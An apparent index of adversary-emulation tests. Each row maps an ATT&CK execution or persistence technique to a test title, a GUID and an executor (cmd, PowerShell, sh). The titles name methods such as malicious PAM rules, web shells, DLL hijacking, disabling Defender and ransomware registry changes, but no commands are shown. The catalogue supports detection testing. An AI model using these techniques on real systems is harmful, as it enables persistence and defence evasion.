1087 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
1088 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
1089 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 3 Suspicious Execution via Windows Command Shell d0eb3597-a1b3-4d65-b33b-2cda8d397f20 command_prompt
1090 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
1091 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 5 Command Prompt read contents from CMD file and execute df81db1b-066c-4802-9bc8-b6d030c3ba8e command_prompt
1092 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 6 Command prompt writing script to file then executes it 00682c9f-7df4-4df8-950b-6dcaaa3ad9af command_prompt
1093 execution T1651 Cloud Administration Command 1 AWS Run Command (and Control) a3cc9c95-c160-4b86-af6f-84fba87bfd30 powershell
1094 execution T1059.005 Command and Scripting Interpreter: Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
1095 execution T1059.005 Command and Scripting Interpreter: Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
1096 execution T1059.005 Command and Scripting Interpreter: Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
1097 execution T1648 Serverless Execution 1 Lambda Function Hijack 87a4a141-c2bb-49d1-a604-8679082d8b91 powershell
1098 execution T1569.002 System Services: Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
1099 execution T1569.002 System Services: Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
1100 execution T1569.002 System Services: Service Execution 3 psexec.py (Impacket) edbcd8c9-3639-4844-afad-455c91e95a35 bash
1101 execution T1569.002 System Services: Service Execution 4 BlackCat pre-encryption cmds with Lateral Movement 31eb7828-97d7-4067-9c1e-c6feb85edc4b powershell
1102 execution T1569.002 System Services: Service Execution 5 Use RemCom to execute a command on a remote host a5d8cdeb-be90-43a9-8b26-cc618deac1e0 command_prompt
1103 execution T1569.002 System Services: Service Execution 6 Snake Malware Service Create b8db787e-dbea-493c-96cb-9272296ddc49 command_prompt
1104 execution T1569.002 System Services: Service Execution 7 Modifying ACL of Service Control Manager via SDET bf07f520-3909-4ef5-aa22-877a50f2f77b command_prompt
1105 execution T1569.002 System Services: Service Execution 8 Pipe Creation - PsExec Tool Execution From Suspicious Locations 004a5d68-627b-452d-af3d-43bd1fc75a3b powershell
1106 execution T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
1107 execution T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
1108 execution T1053.002 Scheduled Task/Job: At 3 At - Schedule a job via kubectl in a Pod 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213 bash
1109 persistence T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
1110 persistence T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
1111 persistence T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
1112 persistence T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
1113 persistence T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
1114 persistence T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
1115 persistence T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
1116 persistence T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
1117 persistence T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
1118 persistence T1053.005 Scheduled Task/Job: Scheduled Task 10 Scheduled Task ("Ghost Task") via Registry Key Manipulation 704333ca-cc12-4bcf-9916-101844881f54 command_prompt
1119 persistence T1053.005 Scheduled Task/Job: Scheduled Task 11 Scheduled Task Persistence via CompMgmt.msc 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2 command_prompt
1120 persistence T1053.005 Scheduled Task/Job: Scheduled Task 12 Scheduled Task Persistence via Eventviewer.msc 02124c37-767e-4b76-9383-c9fc366d9d4c command_prompt
1121 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
1122 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM rule (freebsd) b17eacac-282d-4ca8-a240-46602cf863e3 sh
1123 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 3 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
1124 persistence T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
1125 persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
1126 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
1127 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
1128 persistence T1542.001 Pre-OS Boot: System Firmware 1 UEFI Persistence via Wpbbin.exe File Creation b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1 powershell
1129 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
1130 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
1131 persistence T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
1132 persistence T1547 Boot or Logon Autostart Execution 2 Driver Installation Using pnputil.exe 5cb0b071-8a5a-412f-839d-116beb2ed9f7 powershell
1133 persistence T1547 Boot or Logon Autostart Execution 3 Leverage Virtual Channels to execute custom DLL during successful RDP session fdd45306-74f6-4ade-9a97-0a4895961228 command_prompt
1134 persistence T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
1135 persistence T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
1136 persistence T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
1137 persistence T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
1138 persistence T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
1139 persistence T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
1140 persistence T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
1141 persistence T1543.003 Create or Modify System Process: Windows Service 5 Remote Service Installation CMD fb4151a2-db33-4f8c-b7f8-78ea8790f961 command_prompt
1142 persistence T1543.003 Create or Modify System Process: Windows Service 6 Modify Service to Run Arbitrary Binary (Powershell) 1f896ce4-8070-4959-8a25-2658856a70c9 powershell
1143 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
1144 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
1145 persistence T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
1146 persistence T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
1147 persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
1148 persistence T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
1149 persistence T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
1150 persistence T1547.012 Boot or Logon Autostart Execution: Print Processors 1 Print Processors f7d38f47-c61b-47cc-a59d-fc0368f47ed0 powershell
1151 persistence T1574.001 Hijack Execution Flow: DLL 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
1152 persistence T1574.001 Hijack Execution Flow: DLL 2 Phantom Dll Hijacking - WinAppXRT.dll 46ed938b-c617-429a-88dc-d49b5c9ffedb command_prompt
1153 persistence T1574.001 Hijack Execution Flow: DLL 3 Phantom Dll Hijacking - ualapi.dll 5898902d-c5ad-479a-8545-6f5ab3cfc87f command_prompt
1154 persistence T1574.001 Hijack Execution Flow: DLL 4 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
1155 persistence T1574.001 Hijack Execution Flow: DLL 5 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
1156 persistence T1574.001 Hijack Execution Flow: DLL 6 DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE c095ad8e-4469-4d33-be9d-6f6d1fb21585 powershell
1157 persistence T1137.006 Office Application Startup: Add-ins 1 Code Executed Via Excel Add-in File (XLL) 441b1a0f-a771-428a-8af0-e99e4698cda3 powershell
1158 persistence T1137.006 Office Application Startup: Add-ins 2 Persistent Code Execution Via Excel Add-in File (XLL) 9c307886-9fef-41d5-b344-073a0f5b2f5f powershell
1159 persistence T1137.006 Office Application Startup: Add-ins 3 Persistent Code Execution Via Word Add-in File (WLL) 95408a99-4fa7-4cd6-a7ef-cb65f86351cf powershell
1160 persistence T1137.006 Office Application Startup: Add-ins 4 Persistent Code Execution Via Excel VBA Add-in File (XLAM) 082141ed-b048-4c86-99c7-2b8da5b5bf48 powershell
1161 persistence T1137.006 Office Application Startup: Add-ins 5 Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM) f89e58f9-2b49-423b-ac95-1f3e7cfd8277 powershell
1162 persistence T1505.002 Server Software Component: Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
1163 persistence T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
1164 persistence T1556.002 Modify Authentication Process: Password Filter DLL 2 Install Additional Authentication Packages 91580da6-bc6e-431b-8b88-ac77180005f2 powershell
1165 persistence T1505.005 Server Software Component: Terminal Services DLL 1 Simulate Patching termsrv.dll 0b2eadeb-4a64-4449-9d43-3d999f4a317b powershell
1166 persistence T1505.005 Server Software Component: Terminal Services DLL 2 Modify Terminal Services DLL Path 18136e38-0530-49b2-b309-eed173787471 powershell
1167 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
1168 persistence T1176 Browser Extensions 2 Chrome/Chromium (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
1169 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
1170 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
1171 persistence T1176 Browser Extensions 5 Google Chrome Load Unpacked Extension With Command Line 7a714703-9f6b-461c-b06d-e6aeac650f27 powershell
1172 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
1173 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
1174 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
1175 persistence T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
1176 persistence T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
1177 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
1178 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
1179 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
1180 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 2 Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry de3f8e74-3351-4fdb-a442-265dbf231738 powershell
1181 persistence T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
1182 persistence T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
1183 persistence T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
1184 persistence T1112 Modify Registry 4 Use Powershell to Modify registry to store logon credentials 68254a85-aa42-4312-a695-38b7276307f8 powershell
1185 persistence T1112 Modify Registry 5 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
1186 persistence T1112 Modify Registry 6 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
1187 persistence T1112 Modify Registry 7 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
1188 persistence T1112 Modify Registry 8 BlackByte Ransomware Registry Changes - CMD 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b command_prompt
1189 persistence T1112 Modify Registry 9 BlackByte Ransomware Registry Changes - Powershell 0b79c06f-c788-44a2-8630-d69051f1123d powershell
1190 persistence T1112 Modify Registry 10 Disable Windows Registry Tool ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 command_prompt
1191 persistence T1112 Modify Registry 11 Disable Windows CMD application d2561a6d-72bd-408c-b150-13efe1801c2a powershell
1192 persistence T1112 Modify Registry 12 Disable Windows Task Manager application af254e70-dd0e-4de6-9afe-a994d9ea8b62 command_prompt
1193 persistence T1112 Modify Registry 13 Disable Windows Notification Center c0d6d67f-1f63-42cc-95c0-5fd6b20082ad command_prompt
1194 persistence T1112 Modify Registry 14 Disable Windows Shutdown Button 6e0d1131-2d7e-4905-8ca5-d6172f05d03d command_prompt
1195 persistence T1112 Modify Registry 15 Disable Windows LogOff Button e246578a-c24d-46a7-9237-0213ff86fb0c command_prompt
1196 persistence T1112 Modify Registry 16 Disable Windows Change Password Feature d4a6da40-618f-454d-9a9e-26af552aaeb0 command_prompt
1197 persistence T1112 Modify Registry 17 Disable Windows Lock Workstation Feature 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 command_prompt
1198 persistence T1112 Modify Registry 18 Activate Windows NoDesktop Group Policy Feature 93386d41-525c-4a1b-8235-134a628dee17 command_prompt
1199 persistence T1112 Modify Registry 19 Activate Windows NoRun Group Policy Feature d49ff3cc-8168-4123-b5b3-f057d9abbd55 command_prompt
1200 persistence T1112 Modify Registry 20 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
1201 persistence T1112 Modify Registry 21 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
1202 persistence T1112 Modify Registry 22 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
1203 persistence T1112 Modify Registry 23 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
1204 persistence T1112 Modify Registry 24 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
1205 persistence T1112 Modify Registry 25 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
1206 persistence T1112 Modify Registry 26 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
1207 persistence T1112 Modify Registry 27 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
1208 persistence T1112 Modify Registry 28 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
1209 persistence T1112 Modify Registry 29 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
1210 persistence T1112 Modify Registry 30 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
1211 persistence T1112 Modify Registry 31 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
1212 persistence T1112 Modify Registry 32 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
1213 persistence T1112 Modify Registry 33 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
1214 persistence T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
1215 persistence T1112 Modify Registry 35 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
1216 persistence T1112 Modify Registry 36 Disable Windows Toast Notifications 003f466a-6010-4b15-803a-cbb478a314d7 command_prompt
1217 persistence T1112 Modify Registry 37 Disable Windows Security Center Notifications 45914594-8df6-4ea9-b3cc-7eb9321a807e command_prompt
1218 persistence T1112 Modify Registry 38 Suppress Win Defender Notifications c30dada3-7777-4590-b970-dc890b8cf113 command_prompt
1219 persistence T1112 Modify Registry 39 Allow RDP Remote Assistance Feature 86677d0e-0b5e-4a2b-b302-454175f9aa9e command_prompt
1220 persistence T1112 Modify Registry 40 NetWire RAT Registry Key Creation 65704cd4-6e36-4b90-b6c1-dc29a82c8e56 command_prompt
1221 persistence T1112 Modify Registry 41 Ursnif Malware Registry Key Creation c375558d-7c25-45e9-bd64-7b23a97c1db0 command_prompt
1222 persistence T1112 Modify Registry 42 Terminal Server Client Connection History Cleared 3448824b-3c35-4a9e-a8f5-f887f68bea21 command_prompt
1223 persistence T1112 Modify Registry 43 Disable Windows Error Reporting Settings d2c9e41e-cd86-473d-980d-b6403562e3e1 command_prompt
1224 persistence T1112 Modify Registry 44 DisallowRun Execution Of Certain Applications 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
1225 persistence T1112 Modify Registry 45 Enabling Restricted Admin Mode via Command_Prompt fe7974e5-5813-477b-a7bd-311d4f535e83 command_prompt
1226 persistence T1112 Modify Registry 46 Mimic Ransomware - Enable Multiple User Sessions 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3 command_prompt
1227 persistence T1112 Modify Registry 47 Mimic Ransomware - Allow Multiple RDP Sessions per User 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9 command_prompt
1228 persistence T1112 Modify Registry 48 Event Viewer Registry Modification - Redirection URL 6174be7f-5153-4afd-92c5-e0c3b7cdb5ae command_prompt
1229 persistence T1112 Modify Registry 49 Event Viewer Registry Modification - Redirection Program 81483501-b8a5-4225-8b32-52128e2f69db command_prompt
1230 persistence T1112 Modify Registry 50 Enabling Remote Desktop Protocol via Remote Registry e3ad8e83-3089-49ff-817f-e52f8c948090 command_prompt
1231 persistence T1112 Modify Registry 51 Disable Win Defender Notification 12e03af7-79f9-4f95-af48-d3f12f28a260 command_prompt
1232 persistence T1112 Modify Registry 52 Disable Windows OS Auto Update 01b20ca8-c7a3-4d86-af59-059f15ed5474 command_prompt
1233 persistence T1112 Modify Registry 53 Disable Windows Auto Reboot for current logon user 396f997b-c5f8-4a96-bb2c-3c8795cf459d command_prompt
1234 persistence T1112 Modify Registry 54 Windows Auto Update Option to Notify before download 335a6b15-b8d2-4a3f-a973-ad69aa2620d7 command_prompt
1235 persistence T1112 Modify Registry 55 Do Not Connect To Win Update d1de3767-99c2-4c6c-8c5a-4ba4586474c8 command_prompt
1236 persistence T1112 Modify Registry 56 Tamper Win Defender Protection 3b625eaa-c10d-4635-af96-3eae7d2a2f3c command_prompt
1237 persistence T1112 Modify Registry 57 Snake Malware Registry Blob 8318ad20-0488-4a64-98f4-72525a012f6b powershell
1238 persistence T1112 Modify Registry 58 Allow Simultaneous Download Registry 37950714-e923-4f92-8c7c-51e4b6fffbf6 command_prompt
1239 persistence T1112 Modify Registry 59 Modify Internet Zone Protocol Defaults in Current User Registry - cmd c88ef166-50fa-40d5-a80c-e2b87d4180f7 command_prompt
1240 persistence T1112 Modify Registry 60 Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell b1a4d687-ba52-4057-81ab-757c3dc0d3b5 powershell
1241 persistence T1112 Modify Registry 61 Activities To Disable Secondary Authentication Detected By Modified Registry Value. c26fb85a-fa50-4fab-a64a-c51f5dc538d5 command_prompt
1242 persistence T1112 Modify Registry 62 Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. ffeddced-bb9f-49c6-97f0-3d07a509bf94 command_prompt
1243 persistence T1112 Modify Registry 63 Scarab Ransomware Defense Evasion Activities ca8ba39c-3c5a-459f-8e15-280aec65a910 command_prompt
1244 persistence T1112 Modify Registry 64 Disable Remote Desktop Anti-Alias Setting Through Registry 61d35188-f113-4334-8245-8c6556d43909 command_prompt
1245 persistence T1112 Modify Registry 65 Disable Remote Desktop Security Settings Through Registry 4b81bcfa-fb0a-45e9-90c2-e3efe5160140 command_prompt
1246 persistence T1112 Modify Registry 66 Disabling ShowUI Settings of Windows Error Reporting (WER) 09147b61-40f6-4b2a-b6fb-9e73a3437c96 command_prompt
1247 persistence T1112 Modify Registry 67 Enable Proxy Settings eb0ba433-63e5-4a8c-a9f0-27c4192e1336 command_prompt
1248 persistence T1112 Modify Registry 68 Set-Up Proxy Server d88a3d3b-d016-4939-a745-03638aafd21b command_prompt
1249 persistence T1112 Modify Registry 69 RDP Authentication Level Override 7e7b62e9-5f83-477d-8935-48600f38a3c6 command_prompt
1250 persistence T1112 Modify Registry 70 Enable RDP via Registry (fDenyTSConnections) 16bdbe52-371c-4ccf-b708-79fba61f1db4 command_prompt
1251 persistence T1112 Modify Registry 71 Disable Windows Prefetch Through Registry 7979dd41-2045-48b2-a54e-b1bc2415c9da command_prompt
1252 persistence T1112 Modify Registry 72 Setting Shadow key in Registry for RDP Shadowing ac494fe5-81a4-4897-af42-e774cf005ecb powershell
1253 persistence T1112 Modify Registry 73 Flush Shimcache ecbd533e-b45d-4239-aeff-b857c6f6d68b command_prompt
1254 persistence T1112 Modify Registry 74 Disable Windows Remote Desktop Protocol 5f8e36de-37ca-455e-b054-a2584f043c06 command_prompt
1255 persistence T1112 Modify Registry 75 Enforce Smart Card Authentication Through Registry 4c4bf587-fe7f-448f-ba8d-1ecec9db88be command_prompt
1256 persistence T1112 Modify Registry 76 Requires the BitLocker PIN for Pre-boot authentication 26fc7375-a551-4336-90d7-3f2817564304 command_prompt
1257 persistence T1112 Modify Registry 77 Modify EnableBDEWithNoTPM Registry entry bacb3e73-8161-43a9-8204-a69fe0e4b482 command_prompt
1258 persistence T1112 Modify Registry 78 Modify UseTPM Registry entry 7c8c7bd8-0a5c-4514-a6a3-0814c5a98cf0 command_prompt
1259 persistence T1112 Modify Registry 79 Modify UseTPMPIN Registry entry 10b33fb0-c58b-44cd-8599-b6da5ad6384c command_prompt
1260 persistence T1112 Modify Registry 80 Modify UseTPMKey Registry entry c8480c83-a932-446e-a919-06a1fd1e512a command_prompt
1261 persistence T1112 Modify Registry 81 Modify UseTPMKeyPIN Registry entry 02d8b9f7-1a51-4011-8901-2d55cca667f9 command_prompt
1262 persistence T1112 Modify Registry 82 Modify EnableNonTPM Registry entry e672a340-a933-447c-954c-d68db38a09b1 command_prompt
1263 persistence T1112 Modify Registry 83 Modify UsePartialEncryptionKey Registry entry b5169fd5-85c8-4b2c-a9b6-64cc0b9febef command_prompt
1264 persistence T1112 Modify Registry 84 Modify UsePIN Registry entry 3ac0b30f-532f-43c6-8f01-fb657aaed7e4 command_prompt
1265 persistence T1112 Modify Registry 85 Abusing Windows TelemetryController Registry Key for Persistence 4469192c-2d2d-4a3a-9758-1f31d937a92b command_prompt
1266 persistence T1112 Modify Registry 86 Modify RDP-Tcp Initial Program Registry Entry c691cee2-8d17-4395-b22f-00644c7f1c2d command_prompt
1267 persistence T1112 Modify Registry 87 Abusing MyComputer Disk Cleanup Path for Persistence f2915249-4485-42e2-96b7-9bf34328d497 command_prompt
1268 persistence T1112 Modify Registry 88 Abusing MyComputer Disk Fragmentation Path for Persistence 3235aafe-b49d-451b-a1f1-d979fa65ddaf command_prompt
1269 persistence T1112 Modify Registry 89 Abusing MyComputer Disk Backup Path for Persistence 599f3b5c-0323-44ed-bb63-4551623bf675 command_prompt
1270 persistence T1112 Modify Registry 90 Adding custom paths for application execution 573d15da-c34e-4c59-a7d2-18f20d92dfa3 command_prompt
1271 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
1272 persistence T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
1273 persistence T1505.003 Server Software Component: Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
1274 persistence T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1275 persistence T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
1276 persistence T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
1277 persistence T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
1278 persistence T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
1279 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
1280 persistence T1546.005 Event Triggered Execution: Trap 2 Trap EXIT (freebsd) be1a5d70-6865-44aa-ab50-42244c9fd16f sh
1281 persistence T1546.005 Event Triggered Execution: Trap 3 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
1282 persistence T1546.005 Event Triggered Execution: Trap 4 Trap SIGINT (freebsd) ade10242-1eac-43df-8412-be0d4c704ada sh
1283 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
1284 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
1285 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
1286 persistence T1136.001 Create Account: Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
1287 persistence T1136.001 Create Account: Local Account 2 Create a user account on a FreeBSD system a39ee1bc-b8c1-4331-8e5f-1859eb408518 sh
